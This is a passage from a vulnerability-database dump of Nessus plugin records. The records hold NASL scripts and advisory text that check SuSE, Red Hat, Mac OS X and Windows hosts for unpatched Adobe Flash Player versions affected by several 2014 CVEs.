&&\n ver_compare(ver:version, fix:extended_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = extended_fixed_version;\n\nelse if (version =~ \"^11\\.[89]\\.\") fixed_version_for_report = standard_fixed_version;\nelse if (\n version =~ \"^12\\.0\\.0\\.\" &&\n ver_compare(ver:version, fix:standard_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = standard_fixed_version;\n\nif (!isnull(fixed_version_for_report))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-15T14:20:40", "description": "This update of Adobe Flash Player fixes the following issues :\n\n - A stack overflow vulnerability that could have resulted in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability that could have been used to defeat memory address layout randomization.\n (CVE-2014-0499)\n\n - A double free vulnerability that could have resulted in arbitrary code execution. (CVE-2014-0502)", "cvss3": {}, "published": "2014-02-26T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 8922)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player", "p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_FLASH-PLAYER-140224.NASL", "href": "https://www.tenable.com/plugins/nessus/72700", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72700);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 8922)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of Adobe Flash Player fixes the following issues :\n\n - A stack overflow vulnerability that could have resulted\n in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability that could have been used to\n defeat memory address layout randomization.\n (CVE-2014-0499)\n\n - A double free vulnerability that could have resulted in\n arbitrary code execution. (CVE-2014-0502)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=865021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0498.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0499.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0502.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 8922.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.341-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.341-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.341-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.341-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.341-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.341-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-15T14:20:38", "description": "An updated Adobe Flash Player package that fixes three security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security bulletin APSB14-07, listed in the References section. Specially crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the malicious SWF content. (CVE-2014-0498, CVE-2014-0499, CVE-2014-0502)\n\nAll users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.341.", "cvss3": {}, "published": "2014-02-23T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:0196)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2014-0196.NASL", "href": "https://www.tenable.com/plugins/nessus/72643", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0196. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72643);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_xref(name:\"RHSA\", value:\"2014:0196\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:0196)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes three security issues\nis now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\nCritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security bulletin\nAPSB14-07, listed in the References section. Specially crafted SWF\ncontent could cause flash-plugin to crash or, potentially, execute\narbitrary code when a victim loads a page containing the malicious SWF\ncontent. (CVE-2014-0498, CVE-2014-0499, CVE-2014-0502)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.341.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-07.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0499\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0498\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0502\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0196\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.341-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.341-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:34:26", "description": "Versions of Adobe Flash Player prior to 12.0.0.77 (or 11.7.700.272 for Linux users) are outdated and thus unpatched for the following vulnerabilities :\n\n - A same origin policy bypass vulnerability (CVE-2014-0503).\n - Clipboard content access by an unauthorized, context-dependent attacker (CVE-2014-0504).", "cvss3": {}, "published": "2013-03-13T00:00:00", "type": "nessus", "title": "Flash Player < 12.0.0.77 Multiple Vulnerabilities (APSB14-08)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "8157.PRM", "href": "https://www.tenable.com/plugins/nnm/8157", "sourceData": "Binary data 8157.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:53", "description": "According to its version, the instance of Flash Player installed on the remote Mac OS X host is equal or prior to 11.7.700.269 / 11.8.x / 11.9.x / 12.0.0.70. It is, therefore, potentially affected by multiple vulnerabilities :\n\n - A vulnerability exists that could be used to bypass the same origin policy. (CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the contents of the clipboard. (CVE-2014-0504)", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "nessus", "title": "Flash Player for Mac <= 11.7.700.269 / 12.0.0.70 Multiple Vulnerabilities (APSB14-08) (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_12_0_0_77.NASL", "href": "https://www.tenable.com/plugins/nessus/72938", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72938);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n\n script_name(english:\"Flash Player for Mac <= 11.7.700.269 / 12.0.0.70 Multiple Vulnerabilities (APSB14-08) (Mac OS X)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Mac OS X host is equal or prior to 11.7.700.269 / 11.8.x /\n11.9.x / 12.0.0.70. It is, therefore, potentially affected by\nmultiple vulnerabilities :\n\n - A vulnerability exists that could be used to bypass the\n same origin policy. (CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the\n contents of the clipboard. (CVE-2014-0504)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.272 / 12.0.0.77 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0503\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nextended_cutoff_version = \"11.7.700.269\";\nextended_fixed_version = \"11.7.700.272\";\n\nstandard_cutoff_version = \"12.0.0.70\";\nstandard_fixed_version = \"12.0.0.77\";\n\nfixed_version_for_report = NULL;\n\nif (version =~ \"^([0-9]|10)\\.|^11\\.[0-6]\")\n fixed_version_for_report = extended_fixed_version;\n\nelse if (\n version =~ \"^11\\.7\\.\" &&\n ver_compare(ver:version, fix:extended_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = extended_fixed_version;\n\nelse if (version =~ \"^11\\.[89]\\.\") fixed_version_for_report = standard_fixed_version;\nelse if (\n version =~ \"^12\\.0\\.0\\.\" &&\n ver_compare(ver:version, fix:standard_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = standard_fixed_version;\n\nif (!isnull(fixed_version_for_report))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:51", "description": "The remote host is missing KB2938527. It is, therefore, affected by multiple vulnerabilities :\n\n - A vulnerability exists that could be used to bypass the same origin policy. (CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the contents of the clipboard. (CVE-2014-0504)", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "nessus", "title": "MS KB2938527: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB2938527.NASL", "href": "https://www.tenable.com/plugins/nessus/72936", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72936);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n script_xref(name:\"MSKB\", value:\"2938527\");\n\n script_name(english:\"MS KB2938527: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks version of ActiveX control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an ActiveX control installed that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB2938527. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A vulnerability exists that could be used to bypass the\n same origin policy. (CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the\n contents of the clipboard. (CVE-2014-0504)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2938527/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB2938527.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0503\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 12.0.0.77\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 12 ||\n (\n iver[0] == 12 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 77)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 12.0.0.77\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:38", "description": "An updated Adobe Flash Player package that fixes two security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update fixes two vulnerabilities in Adobe Flash Player. These vulnerabilities are detailed in the Adobe Security bulletin APSB14-08, listed in the References section.\n\nA vulnerability was reported that could be used to bypass the same origin policy. (CVE-2014-0503)\n\nA vulnerability was reported that could be used to read the contents of the clipboard. (CVE-2014-0504)\n\nAll users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.346.", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:0289)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2014-0289.NASL", "href": "https://www.tenable.com/plugins/nessus/72976", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0289. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72976);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n script_xref(name:\"RHSA\", value:\"2014:0289\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:0289)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes two security issues\nis now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes two vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security bulletin APSB14-08,\nlisted in the References section.\n\nA vulnerability was reported that could be used to bypass the same\norigin 